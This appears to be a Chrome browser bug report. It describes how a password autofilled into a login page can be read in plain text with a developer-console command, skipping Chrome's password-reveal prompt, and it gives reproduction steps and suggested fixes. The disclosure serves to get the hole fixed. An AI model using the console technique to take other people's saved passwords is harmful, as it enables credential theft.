VULNERABILITY DETAILS
Asking for the user's account password is rendered void and bypassable by this extremely easy to do tactic.

VERSION
Chrome Version: Version 61.0.3163.100 (Official Build) (64-bit)
Operating System: Windows 10

REPRODUCTION CASE

Instead of trying to view the user's password, in the list, instead you would do the following:

1. Visit website login page - or click "logout" on website
2. Using Inspect Element, simply obtain the Password Element's ID once Autocomplete has run.
3. In the console, use document.getElementById("password").value - with "password" being the element ID.
4. You now have their password.

This could be exploited by addons that have gone rogue to name one of a million use cases.

SUGGESTIONS

Using a genuine Password mask and not just an input mask. 
On form post or button click, silently replace the password with the Genuine one - this could even be done internally in Chrome so that the user's password never actually hits the visible web page when inserted by Autocomplete.